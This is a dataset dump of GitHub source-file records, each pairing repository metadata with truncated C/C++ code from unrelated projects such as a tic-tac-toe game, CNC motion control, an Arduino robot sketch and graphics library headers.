/* http://visualizationlibrary.org ... | [
"hello@michelebosi.com"
] | hello@michelebosi.com |
0a7a6a873c5e22850c5dbe194ca16691cbfeea5d | 0d37a489416e75ff013ebec2fbc2fdad80a521ac | /lib-spiflashstore/include/storeslushdmx.h | 169b842531f1b534359a0faadf0a9c9f29bf427e | [] | no_license | JohnSHoover/rpidmx512 | fc26f7ee9ead5c1a9cb4dbbac5b4963744d3353d | ed1416b693d28030ba9ae45a25adf0f280bfc70b | refs/heads/master | 2022-04-10T17:31:36.334680 | 2020-04-10T16:48:45 | 2020-04-10T16:48:45 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,779 | h | /**
* @file storeslushdmx.h
*
*/
/* Copyright (C) 2019 by Arjan van Vught mailto:info@orangepi-dmx.nl
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including w... | [
"Arjan.van.Vught@gmail.com"
] | Arjan.van.Vught@gmail.com |
565085d1b63a914790287227f32cbd722ad2cb1e | 601490f589afae6815d51cd831c930d330cdbb3d | /contest/arc/arc029/a.cpp | d55ea3925aafc8144c79abab1f46ee17f0320f81 | [] | no_license | hiramekun/CompetitiveProgrammingContests | cd26974d1e8f0b9b2dc3380dcccff00a8fb6833c | 1bcb2f840c9b44c438cc8c3d07c72fc5ff78f61a | refs/heads/master | 2022-01-02T06:29:36.759306 | 2021-12-29T00:44:59 | 2021-12-29T00:44:59 | 226,824,121 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 869 | cpp | #include <cstdio>
#include <algorithm>
#include <iostream>
#include <vector>
#include <map>
#include <unordered_map>
#include <cmath>
#include <queue>
#include <set>
using namespace std;
typedef long long ll;
#define INF int(1e9)
#define REP(i, n) for(int i = 0; i < (int)(n); i++)
#define REPR(i, n) for(int i = n - 1;... | [
"thescript1210@gmail.com"
] | thescript1210@gmail.com |
246b2a03fa96b546577a62c84128b282c2c3ef39 | cecb4e2d362f2b8d30602dec42946f2b74aaf4cf | /src/DAF/AEManagement/AEMgmt.cc | 0ea3bdd9362105c9ce433ce06e2bac27c132e5a8 | [
"MIT"
] | permissive | kaleal/RINA | f4819dac38d51f525ba98ff11190549da27d90c7 | b1cec2a1f6dff4bbf95a967350cd4d533833a1d0 | refs/heads/master | 2021-06-24T16:48:24.875361 | 2017-08-13T20:54:19 | 2017-08-13T20:54:19 | 78,782,267 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,356 | cc | //
// The MIT License (MIT)
//
// Copyright (c) 2014-2016 Brno University of Technology, PRISTINE project
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including ... | [
"tomas.hykel@acision.com"
] | tomas.hykel@acision.com |
82af421e23c71f2837c891f31c15cf59b4ec6e01 | bbe25c9797d4aab0472454788b88346bd2e04b8b | /libraries/LC_Screen/screen.cpp | f29727516ac175ef982562b8e4d6458a328b5943 | [] | no_license | Stage53/Arduino | a5bde43475e18c9fe28ae4ae42b7fe501ac5da7f | fd861f943c5176d8ba19e657383ecdf38ba14e38 | refs/heads/master | 2020-07-28T05:04:08.966076 | 2019-09-18T11:18:54 | 2019-09-18T11:18:54 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,135 | cpp |
#include "screen.h"
#include "adafruit_1431_Obj.h"
#include "adafruit_684_Obj.h"
#include "adafruit_1947_Obj.h"
#include <LC_SPI.h>
#include <SD.h>
displayObj* screen = NULL;
bool initScreen(byte hardware, byte csPin, byte inRotation) {
return initScreen(hardware,csPin, -1,inRotation);
}
bool initScreen(byte ... | [
"gitHub@leftcoast.biz"
] | gitHub@leftcoast.biz |
566c2916145e1b7388913ee62be327b35c22737e | 624511f6ad0cf17a2ba1a1ea1f25c3b139ce4295 | /baselib/basecore/Lscext/vs/math.h | ab94f5d53bfb25928b509e4c66fd8f72ea034e32 | [] | no_license | lightchainone/lightchain | 7d90338d4a4e8d31d550c07bf380c06580941334 | 6fc7019c76a8b60d4fd63fba58fa79858856f66b | refs/heads/master | 2021-05-11T05:47:17.672527 | 2019-12-16T09:51:39 | 2019-12-16T09:51:39 | 117,969,593 | 23 | 6 | null | null | null | null | UTF-8 | C++ | false | false | 13,961 | h | #ifndef __BSL_VS_MATH_H__
#define __BSL_VS_MATH_H__
#include <Lsc/var/IVar.h>
#include <Lsc/ResourcePool.h>
namespace Lsc{ namespace vs{
Lsc::var::IVar& int8_equal( Lsc::var::IVar& args, Lsc::ResourcePool& rp );
Lsc::var::IVar& uint8_equal( Lsc::var::IVar& args, Lsc::ResourcePool& rp );
... | [
"lightchainone@hotmail.com"
] | lightchainone@hotmail.com |
c949dbadccc9ca39b1e682fd2d81d7f4cfcef936 | a4ee06bd408862827bd0dcbb905a213b45bf593b | /LIB/lex/v2/io.hpp | 1936eb63eb007fb543c485de97a91cd4e0082e96 | [] | no_license | davekessener/VirtualMachine | 1a6b3af761e2763eebd1d61010fda517f51167d5 | 61679dd47f17246cad8261781000cf4aca5bfe14 | refs/heads/master | 2021-01-17T14:53:55.771007 | 2016-05-29T13:15:33 | 2016-05-29T13:15:33 | 14,454,172 | 0 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 3,056 | hpp | #ifndef DAV_IO_H
#define DAV_IO_H
#include <string>
#include <iosfwd>
#include <iterator>
#include <memory>
#include <cassert>
#include "lib.hpp"
namespace dav
{
namespace io
{
template<typename T>
class ReadContainer
{
public:
virtual ~ReadContainer( ) { }
virtual size_t pos( ) const { return -1; ... | [
"BroSkylark@gmail.com"
] | BroSkylark@gmail.com |
432ca1e42f0ed88c5347f02ab61e0a241bd256ab | f9b45fd409384de3c69d68c62c0f21d9196e6927 | /Felix/ImportMultitermFile_test.cpp | 92fed49b06250a4a3fdcbcad06860fd1fd50a6c7 | [
"MIT"
] | permissive | ultimatezen/felix | 04799eb666b54e2eeea961dc983cf3721f5182de | 5a7ad298ca4dcd5f1def05c60ae3c84519ec54c4 | refs/heads/master | 2020-04-08T14:21:02.872525 | 2016-02-16T01:18:11 | 2016-02-16T01:18:11 | 159,433,144 | 0 | 1 | null | null | null | null | SHIFT_JIS | C++ | false | false | 2,885 | cpp | #include "StdAfx.h"
#include "ImportMultitermFile.h"
#include "MockListener.h"
#include "memory_local.h"
#include "felix_factory.h"
#ifdef UNIT_TEST
#include <boost/test/unit_test.hpp>
#include "input_device_fake.h"
BOOST_AUTO_TEST_SUITE( TestCImportMultitermFile )
using namespace mem_engine ;
BOO... | [
"software@ginstrom.com"
] | software@ginstrom.com |
fbd2105467bf29f35138f0da9f39e5577162e837 | 73cfd700522885a3fec41127e1f87e1b78acd4d3 | /_Include/boost/test/tools/old/interface.hpp | 1501c6a1beebcba3dae0d28f020951ab8bbb2ccc | [] | no_license | pu2oqa/muServerDeps | 88e8e92fa2053960671f9f57f4c85e062c188319 | 92fcbe082556e11587887ab9d2abc93ec40c41e4 | refs/heads/master | 2023-03-15T12:37:13.995934 | 2019-02-04T10:07:14 | 2019-02-04T10:07:14 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 16,087 | hpp | ////////////////////////////////////////////////////////////////////////////////
// interface.hpp
// (C) Copyright Gennadiy Rozental 2001-2014.
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// See ... | [
"langley.joshua@gmail.com"
] | langley.joshua@gmail.com |
cc49e00728a701988cd4dcef22c568a3544ec733 | 4db144c963de20229fafe0c1a8c9789ce3e091da | /lib/Write.h | aa0ca4b9277e09367e07ad89ecb77075e1396e63 | [] | no_license | adderly/space_mess_SDL | 97af9cfd8c6b282e6945294d63322ae9b67fcca0 | 73af9130b9f330aad5415dd2465c0eb86ee1bc42 | refs/heads/master | 2016-09-07T19:05:01.104163 | 2012-06-06T05:21:13 | 2012-06-06T05:21:13 | 2,865,103 | 0 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 289 | h | #ifndef WRITE
#define WRITE
class Write
{
public:
virtual void write(const std::string filename)=0;
virtual void write(const std::string filename,const std::string location)=0;
virtual bool checkExistance(const std::string filename,const std::string location)=0;
};
#endif
| [
"adderlygonzalez@gmail.com"
] | adderlygonzalez@gmail.com |
46e4065533d5d20579f65f6418b276b3862b255d | de4a831274d58250df776601265d010585a52df3 | /test/exceptions/service.cpp | d9b72cab8e0b08ff5b538cb4f47d7ae11152036e | [] | no_license | TomasCzipri/IncludeOS | 1d5cd51cc0f4bfaf921027b8139df3e50e6c3449 | 2a1da59ca26d8c9386e6decf296d0ada2789e74f | refs/heads/master | 2020-12-06T17:16:27.621307 | 2015-11-25T16:04:30 | 2015-11-25T16:04:30 | 45,671,416 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,077 | cpp | #include <os>
#include <stdio.h>
class CustomException : public std::runtime_error {
using runtime_error::runtime_error;
};
void Service::start()
{
printf("TESTING Exceptions \n");
const char* error_msg = "Crazy Error!";
try {
printf("[x] Inside try-block \n");
if (OS::uptime() > 0.1){
... | [
"alfred.bratterud@hioa.no"
] | alfred.bratterud@hioa.no |
fbcbf51f473e120c3bace649ff6cb4c78fe92714 | d26bb3fcd64ff9e9c54089fdf960ced904349113 | /logdevice/admin/safety/SafetyChecker.cpp | deb303758ad39443c8aee0c03b3ab666d45b3a99 | [
"BSD-3-Clause"
] | permissive | zhaohaidao/LogDevice | 992056badd72a143f4ad236638382864d718fdbf | 7028e97d305981936056e1651542f54ef5c420f0 | refs/heads/master | 2020-05-19T14:01:19.766972 | 2019-05-05T02:37:40 | 2019-05-05T03:23:59 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,973 | cpp | /**
* Copyright (c) 2017-present, Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include "logdevice/admin/safety/SafetyChecker.h"
#include <boost/format.hpp>
#includ... | [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
96a5e06bdf8291f87ff3427cea668f5320bc3b91 | 0ee189afe953dc99825f55232cd52b94d2884a85 | /mstd/wide_stream.hpp | 67b7d878226fcece8e80c3ceb8029b053e63a29a | [] | no_license | spolitov/lib | fed99fa046b84b575acc61919d4ef301daeed857 | 7dee91505a37a739c8568fdc597eebf1b3796cf9 | refs/heads/master | 2016-09-11T02:04:49.852151 | 2011-08-11T18:00:44 | 2011-08-11T18:00:44 | 2,192,752 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 901 | hpp | #pragma once
#include "strings.hpp"
namespace mstd {
template<class T>
class wide_stream_impl {
public:
explicit wide_stream_impl(T & impl)
: impl_(impl) {}
T & impl()
{
return impl_;
}
private:
T & impl_;
};
template<class T>
wide_stream_impl<T> wide_stream... | [
"admin@zranger.net"
] | admin@zranger.net |
6e7607496c899e0281fcafe8ec4f8fca6bfbd635 | 817fe6d73b75a24d9c39dca3fce3bc92e0ac8599 | /app/src/main/cpp/MP4EncoderHelper.cpp | d23f369dcb678511c6d3c56d940a8fce4390ea00 | [] | no_license | gaulle2005/mp4muxer | 84544efec481c6900516cc659f0cc4e9290d24e8 | 97bbae69d1e0b0d25b883866b60246e1a9c4be10 | refs/heads/master | 2023-03-21T01:06:08.856905 | 2019-02-15T09:42:13 | 2019-02-15T09:42:13 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,397 | cpp | //
// Created by chezi on 2017/9/13.
//
#include <jni.h>
#include <mp4v2/mp4v2.h>
#include "MP4Encoder.h"
#include "android/log.h"
#define LOG_TAG "MP4EncoderHelper.cpp"
#define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__);
MP4Encoder mp4Encoder;
MP4FileHandle mp4FileHandle;
extern "C"
JNI... | [
"qushi1123"
] | qushi1123 |
63c61687d5ff088d52e1a4e738e58e49325528e4 | 5f4b7850caed77bf1d2ca8d5125dc21099b79209 | /Chapter 8-Efficient algorithm design/& 8.23.cpp | 14b025744f6ba39a7f4aaed31b4a16df97287a4c | [] | no_license | Inuyashaaaaa/IntroductionToAlgorithmicContests | 92720cffae226b6951aa389a14fcaacb94b3c275 | 55c69843f42162ed3b8f661c20f451c1174bfff1 | refs/heads/master | 2020-06-20T00:24:10.893652 | 2020-03-14T06:32:12 | 2020-03-14T06:32:12 | 196,926,192 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,377 | cpp | #include<bits/stdc++.h>
#define LL long long
#define ms(s) memset(s, 0, sizeof(s))
#define REP(i, a, b) for(int i = (a); i < (b); i++)
#define INF 0X7fffffff
using namespace std;
const int maxn = 1e6 + 10;
int rain[maxn];
int pre[maxn];
int ans[maxn];
int main() {
// freopen("in.txt", "r", stdin);
// freopen("... | [
"1486835097@qq.com"
] | 1486835097@qq.com |
222cac6894bfa86cd902f06a46c834fd0859aa62 | f933ab46356c80027b018a374a60656f958843c3 | /project8.cpp | 15a0e6a7c17bdb745f918419d0bc38885e51dab1 | [] | no_license | zrbrounstein/school | d75c463d31f092b8b329a9cbb85e1e24a29c2a3c | 18b26dad4af995e8d5849cd9d74102236c763b45 | refs/heads/master | 2021-01-17T18:35:18.807718 | 2016-08-02T15:36:49 | 2016-08-02T15:36:49 | 64,767,740 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 754 | cpp | #include "stack.h"
using namespace std;
int main(){
Stack asdf;
asdf.push('g');
asdf.push('d');
asdf.push('e');
asdf.push('g');
asdf.push('d');
asdf.push('e');
asdf.push('g');
asdf.push('d');
asdf.push('e');
asdf.push('g');
asdf.push('d');
asdf.push('e');
asdf.push('g');
asdf.push('d');
asdf.push('e')... | [
"noreply@github.com"
] | zrbrounstein.noreply@github.com |
ec296056f225ff64dda748b71091c31fb83d4362 | 3ce4e8ec3f5e2e79693c5f9369f3e97627f2c99d | /main.cpp | bb0c87703f1c12151387ca5d6295bfae46d787ca | [] | no_license | adityarbhatia/2DArraySpiralOrderPrint.cpp | 2fcc284d307684effc40d76044ef24348c57ff05 | c7584e91d316b40a04e37281611ffcd77e1adb34 | refs/heads/master | 2020-06-18T20:32:10.410613 | 2016-11-28T05:37:16 | 2016-11-28T05:37:16 | 74,940,662 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,610 | cpp | #include <iostream>
#include <fstream>
using namespace std;
void printSpiral(int data[][10], int size)
{
int startingRow = 0, startingCol =0, endingRow = size-1, endingCol = size-1;
int i;
while((startingRow <= endingRow) && (startingCol <= endingCol))
{
for(i = startingCol; i <= endingCol... | [
"noreply@github.com"
] | adityarbhatia.noreply@github.com |
3d092ce588a7be1a6af9fde7a24e2da88d457835 | 144717847573ed31a431a7da173b30dfdc40474f | /addons/gameLoop/functions/script_Component.hpp | 75b09ac58a4ca6179cd3627b6206e2c46f439ccb | [] | no_license | GuzzenVonLidl/GW-Addons | 2490922f2c09129dcc0190d661c6c9129ed0cae5 | 22322ad40d0eee0d0a04119815fba541aad8e873 | refs/heads/master | 2021-01-11T08:24:42.297879 | 2020-04-26T16:45:32 | 2020-04-26T16:45:32 | 69,740,701 | 0 | 1 | null | 2020-03-31T21:11:30 | 2016-10-01T13:38:24 | SQF | UTF-8 | C++ | false | false | 54 | hpp | #include "\x\gw\addons\gameLoop\script_component.hpp"
| [
"guzzenvonlidlswe@gmail.com"
] | guzzenvonlidlswe@gmail.com |
4697fa21fba7df0d7a98dce0f5f72e3c7449cd1c | 960765e3c2e8680b282606c1fbc4e6f471e2db4e | /src/ceph-0.72.2-src/common/HeartbeatMap.h | a4aee48a191370276397ae98ab1b331eb6b540c3 | [] | no_license | StarThinking/MOBBS | 7115060a2233e7bd8bb1a9848d6b9a0a469c2bef | 3f9bfe391a3fa0e454b43c6286a33bdda49a44fb | refs/heads/master | 2021-01-13T02:22:18.410864 | 2014-11-05T08:56:41 | 2014-11-05T08:56:41 | 14,044,431 | 3 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 2,101 | h | // -*- mode:C++; tab-width:8; c-basic-offset:2; indent-tabs-mode:t -*-
// vim: ts=8 sw=2 smarttab
/*
* Ceph - scalable distributed file system
*
* Copyright (C) 2011 Sage Weil <sage@newdream.net>
*
* This is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Publi... | [
"sixiangma0408@foxmail.com"
] | sixiangma0408@foxmail.com |
f076b32970d080d8e37150f79b65b57c75a9bb3d | 5265f63a5df5859794462befd46504138f4a25ef | /memory/Memory_Win.cpp | c4ecdbf4c158dd1c217031b4036cb6b5ba23ec33 | [] | no_license | jbzdarkid/Memory | f296035398b6df9b9d731f75d50d3a76f16d623b | 2267c593baeb6e92fef39f57b1999b0ce1362d49 | refs/heads/master | 2023-02-20T17:47:35.869341 | 2021-01-02T09:30:38 | 2021-01-02T09:30:38 | 324,454,887 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 4,019 | cpp | #include "Memory_Win.h"
#include <cassert>
#include <Utils.h>
[[nodiscard]] bool MemoryImpl::Init(std::string processName) {
processName += ".exe";
// First, get the handle of the process
PROCESSENTRY32 entry;
entry.dwSize = sizeof(entry);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_... | [
"jbzdarkid@gmail.com"
] | jbzdarkid@gmail.com |
35a3f7b9699c58d1e2349a705732281692fc7a1f | 2fe616179636487f86167fa7d1283f3c8fba18b9 | /include/FedTree/FL/distributed_server.h | 34e2b0979c040af1d2972847b993d0ad1d62b7bb | [] | no_license | JerryLife/DeltaBoost | 7da9191c07bb3289d87f022b18b04fd89a8e2edd | 75e8a7c0a822e26ac0db49355a1a4560e10b3b06 | refs/heads/main | 2023-08-14T02:09:49.231963 | 2023-07-30T06:48:44 | 2023-07-30T06:48:44 | 672,458,205 | 2 | 0 | null | 2023-07-30T06:39:33 | 2023-07-30T06:39:32 | null | UTF-8 | C++ | false | false | 10,243 | h | //
// Created by 韩雨萱 on 11/4/21.
//
#ifndef FEDTREE_DISTRIBUTED_SERVER_H
#define FEDTREE_DISTRIBUTED_SERVER_H
#include <grpcpp/grpcpp.h>
#include <grpcpp/security/server_credentials.h>
#include <grpcpp/server.h>
#include <grpcpp/server_builder.h>
#include <grpcpp/server_context.h>
#include "FedTree/FL/server.h"
#inc... | [
"hustwuzhaomin@outlook.com"
] | hustwuzhaomin@outlook.com |
ad799323cf826cad7a7c13a267714e0b56ed387a | 13c54e449a9e2b09ba29d05d40b43e839f6a081f | /aiuda/CLASE25/Balanceador/Cliente.cpp | 76e04abab8e8dcc989fbbd294d39c01b4c3e6fd2 | [] | no_license | Julsperez/Practicas-distribuidos | 1c637e96c31a0b7a9715406d14d8ae774a932623 | 98e734c1705102bedb3319ac1bc8fb3d1e728f0d | refs/heads/master | 2022-11-30T12:23:14.663037 | 2020-08-08T23:49:33 | 2020-08-08T23:49:33 | 260,347,969 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,728 | cpp | //#include "Solicitud.h"
#include <iostream>
#include <stdlib.h>
#include <string.h>
using namespace std;
//const char ip1[16] = "10.100.74.141";
//const char ip2[16] = "10.100.74.144";
//const char ip2[16] = "10.100.74.145";
//const char servidor1[16] = "Servidor1.txt";
//const char servidor2[16] = "Servidor2.txt";
/... | [
"julsperez@outlook.com"
] | julsperez@outlook.com |
b8700790fbb6e1d77c893211c590d1e462841646 | 7d391a176f5b54848ebdedcda271f0bd37206274 | /src/Samples/src/samples/specialfx/wave_of_sprites_scene.cpp | e53669a62b8fd76911459afb1cbc1d6e2c3c9877 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | pthom/BabylonCpp | c37ea256f310d4fedea1a0b44922a1379df77690 | 52b04a61467ef56f427c2bb7cfbafc21756ea915 | refs/heads/master | 2021-06-20T21:15:18.007678 | 2019-08-09T08:23:12 | 2019-08-09T08:23:12 | 183,211,708 | 2 | 0 | Apache-2.0 | 2019-04-24T11:06:28 | 2019-04-24T11:06:28 | null | UTF-8 | C++ | false | false | 1,817 | cpp | #include <babylon/samples/specialfx/wave_of_sprites_scene.h>
#include <babylon/cameras/arc_rotate_camera.h>
#include <babylon/engines/scene.h>
#include <babylon/lights/hemispheric_light.h>
#include <babylon/sprites/sprite_manager.h>
namespace BABYLON {
namespace Samples {
WaveOfSpritesScene::WaveOfSpritesScene(ICanv... | [
"sam.dauwe@gmail.com"
] | sam.dauwe@gmail.com |
da8e75ec3d156cacba3b175b4ed2da37662acd2a | 9136db1795fc1475429b452fcfe6e9961a9e917f | /CNCMillWithGCodeInterpreter/motionTest/Motion.cpp | a87025a5a39fd256274f37a8b7ca8333bae7e477 | [] | no_license | duchiy/CNCMillwithGCodeInterpreter | c5baf1082808c2291283faa1e5cf42b2de16f7b5 | b40c346e6ec99e6fd49aedd526021e1d398a690e | refs/heads/master | 2021-01-10T12:24:40.945785 | 2016-05-03T05:29:40 | 2016-05-03T05:29:40 | 50,817,608 | 0 | 1 | null | null | null | null | UTF-8 | C++ | false | false | 47,982 | cpp | // Motion.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
//#include "path.h"
//#include "NMCCOMTYPES.h"
//#include "nmcServo.h"
//#include "Picservo.h"
//#include "nmccom.h"
//#include "ServoInf.h"
//#include "PathPoint.h"
#include <math.h>
#include "MillCmd.h"
#include "MillCmdCtrl.h"
#incl... | [
"d_uchiy@hotmail.com"
] | d_uchiy@hotmail.com |
a4486d661aab6a415bdecf6cbfefe79cebbf7d16 | 88ae8695987ada722184307301e221e1ba3cc2fa | /courgette/ensemble.h | 6485fdb06bd798439a6b2a4be4f9c55976666a27 | [
"BSD-3-Clause"
] | permissive | iridium-browser/iridium-browser | 71d9c5ff76e014e6900b825f67389ab0ccd01329 | 5ee297f53dc7f8e70183031cff62f37b0f19d25f | refs/heads/master | 2023-08-03T16:44:16.844552 | 2023-07-20T15:17:00 | 2023-07-23T16:09:30 | 220,016,632 | 341 | 40 | BSD-3-Clause | 2021-08-13T13:54:45 | 2019-11-06T14:32:31 | null | UTF-8 | C++ | false | false | 8,952 | h | // Copyright 2011 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// The main idea in Courgette is to do patching *under a tranformation*. The
// input is transformed into a new representation, patching occurs in the new
// repesentation, an... | [
"jengelh@inai.de"
] | jengelh@inai.de |
df14c612f3e1ee2373f322b55d620bf19a8e3d22 | dc8a39026a1b316ee737b882bd0ffefbdbcade9e | /Assignment3/PrintMenu.cpp | 5d812339cd40b436211d5bd00d381fb29157cf82 | [] | no_license | packerfan626/CS1D | 69d918cbf28bfb7045ad69cad44d687a92d14b3a | d75fe37918a53e9b3367cd609a7242688da7dd24 | refs/heads/master | 2021-01-18T14:14:51.209814 | 2015-03-18T01:51:31 | 2015-03-18T01:51:31 | 29,570,791 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 670 | cpp | /*********************************************************
* AUTHOR : Dori J. Mouawad
* Assignment#3 : Stacks
* CLASS : CS1D
* SECTION : TTH: 5:30-9:20pm
* Due Date : 2/10/2015
*********************************************************/
#include "header.h"
void PrintMenu(int &selection)
{... | [
"dori_mouawad@hotmail.com"
] | dori_mouawad@hotmail.com |
dd6393c74ab98001f05f66c5fe4a0fc6641825db | 926109e9ce824aa349dce2a04b9c7796c14e2e4f | /pik/yuv_opsin_convert.h | 0a22f58094d9eb37deaa0ef7a52e7e733582beee | [
"MIT"
] | permissive | google/pik | 4d9077e9a5f99a52e30bf4167b9dcfc50432edda | be30e6e06c10b7830b0d5843b6b25666654033cd | refs/heads/master | 2023-05-14T23:43:16.542177 | 2022-10-27T13:53:21 | 2022-10-27T13:53:21 | 98,166,459 | 899 | 68 | MIT | 2023-03-23T18:25:25 | 2017-07-24T08:16:27 | C++ | UTF-8 | C++ | false | false | 792 | h | // Copyright 2017 Google Inc. All Rights Reserved.
//
// Use of this source code is governed by an MIT-style
// license that can be found in the LICENSE file or at
// https://opensource.org/licenses/MIT.
#ifndef PIK_YUV_OPSIN_CONVERT_H_
#define PIK_YUV_OPSIN_CONVERT_H_
#include "pik/image.h"
namespace pik {
Image3B... | [
"deymo@google.com"
] | deymo@google.com |
3ea8313cf2dae6e4bbe0089b8ef0d2bcd890cda9 | ea019377398f18f8fa4341448a09e49c1975e7ea | /Assignments/Lab07_AIGame/Engine/UniformData.cpp | ad6f6e013be37e9fb1e0e3d6dc5998f8fc1fc97b | [] | no_license | jlfurtado/Neumont-GAT420-AI | 4bf6040a1b6af172062a02b1783e608b787d3f44 | e272feabe6d8b4ff5eb8bac460b305117f0d2a10 | refs/heads/master | 2021-09-26T06:26:30.797705 | 2018-07-22T20:04:01 | 2018-07-22T20:04:01 | 141,926,726 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 6,052 | cpp | #include "UniformData.h"
#include "GL\glew.h"
#include "GameLogger.h"
#include <assert.h>
#include "MyGL.h"
namespace Engine
{
UniformData::UniformData()
: m_uniformType(GL_FLOAT_VEC3), m_pUniformData(nullptr), m_uniformDataLoc(0)
{
}
UniformData::UniformData(GLenum type, void * dataAddress, int dataLoc, bool l... | [
"justin.l.furtado@gmail.com"
] | justin.l.furtado@gmail.com |
8f08147e24439bda9cdfbc68a549254af61093be | e32798ac14b1e6c9659f8f85a073daf9fb294969 | /ADB21_Main/ADB21.ino | 1b588332b401749bd431e91c6eb63ddbe4c84ac7 | [] | no_license | 20stefan05/ADB21 | b953df7a92c780cfc5add839cbfe99fba7649327 | 9773b0e8065836a0d11486c4829ad8f3eaf0a460 | refs/heads/main | 2023-08-21T15:41:42.176675 | 2021-10-30T13:41:15 | 2021-10-30T13:41:15 | 422,889,426 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,386 | ino | #include <SoftwareSerial.h>
#include <SPI.h>
#include "mcp2515_can.h"
#include "Move.h"
#include "Lights.h"
SoftwareSerial bt(0, 1);
const int SPI_CS_PIN = 10;
mcp2515_can CAN(SPI_CS_PIN);
void setup() {
// put your setup code here, to run once:
Serial.begin(9600);
bt.begin(9600);
while (CAN_OK != CA... | [
"noreply@github.com"
] | 20stefan05.noreply@github.com |
2dc3eccfb02456a73234e3a49ad1f557d3c66766 | 04842320113506bee48a6072d786331535a4d908 | /headers/MeleeClass.h | 3a95b38039e3556a9d362d3293296f45b9d9a964 | [] | no_license | ausroa/C_RpgGame | 25ebd2bf47a3dcb7e125d3d75786383949c277fd | 2307e380029a0f83644e39f0578163b56b398d0a | refs/heads/master | 2020-03-22T22:56:57.941874 | 2018-08-02T23:03:18 | 2018-08-02T23:03:18 | 140,780,574 | 0 | 1 | null | 2018-07-15T00:01:24 | 2018-07-13T01:18:37 | C++ | UTF-8 | C++ | false | false | 342 | h | //
// Created by ausro on 7/12/2018.
//
#ifndef C_RPGGAME_MELEECLASS_H
#define C_RPGGAME_MELEECLASS_H
#include <iostream>
#include "Character.h"
class MeleeClass: public Character {
private:
public:
MeleeClass();
~MeleeClass();
void Initialize(std::string name);
void PrintStats();
};
#endif //C... | [
"ausroa@gmail.com"
] | ausroa@gmail.com |
e7130cd18e925f44198eff8693042a236f3ed2b1 | 51dc564c9777ee79c1112d08e154c8393e634349 | /TheTicTacToe/src/TicTacToeBoard.cpp | 807af7120e4a2b9194c715ffe5908472a0221797 | [
"MIT"
] | permissive | aryanrawlani28/the-TicTacToe-Project | e86025332732b4f58e89116b4d5ad409e33bd614 | 43792bca8f7e90b3651b298c5c1ab615412ea103 | refs/heads/master | 2020-11-23T21:11:39.673604 | 2020-01-25T08:32:38 | 2020-01-25T08:32:38 | 227,822,178 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 7,851 | cpp | #include "TicTacToeBoard.h"
TicTacToeBoard::TicTacToeBoard()
{
Board1 = {
{' ', ' ', ' '},
{' ', ' ', ' '},
{' ', ' ', ' '}
};
}
const void TicTacToeBoard::getTitle()
{
std::cout << mainTitle;
}
void TicTacToeBoard::PrintBoard(const TicTacToeBoard& B1) const {
std::cout << B1;
}
int TicTacToeBoard::getMov... | [
"aryanrawlani007@gmail.com"
] | aryanrawlani007@gmail.com |
4a6785fb7d5e1e58000a3ee5a246908afed840a8 | 828913caa1ff1ef94ed1f3686ffa5b81fa090f4d | /src/qt/walletframe.cpp | d2a952ae2eb4dcdceea51c5a922c1392dba724cf | [] | no_license | santos177/TradeLayer | 7508c169f331aaa4ff7005ccc2574871428aad21 | 9ac9c2d47d92a9a7a0849234c3f7f8ebf7997e59 | refs/heads/master | 2023-02-04T00:43:26.012639 | 2020-12-17T22:58:42 | 2020-12-17T22:58:42 | 221,568,582 | 0 | 0 | null | 2020-12-17T22:58:43 | 2019-11-13T23:07:45 | C++ | UTF-8 | C++ | false | false | 7,171 | cpp | // Copyright (c) 2011-2019 The Bitcoin Core developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include <qt/walletframe.h>
#include <qt/walletmodel.h>
#include <qt/bitcoingui.h>
#include <qt/walletview.h>
#include <cas... | [
"santos177@gmail.com"
] | santos177@gmail.com |
dcf31a59a85f5f5de4bdef80f6e852dda78d41f0 | 4d4822b29e666cea6b2d99d5b9d9c41916b455a9 | /Example/Pods/Headers/Private/GeoFeatures/boost/preprocessor/repetition.hpp | 6cbd0f411d54b7b64f8a81488788360532afbc29 | [
"BSL-1.0",
"Apache-2.0"
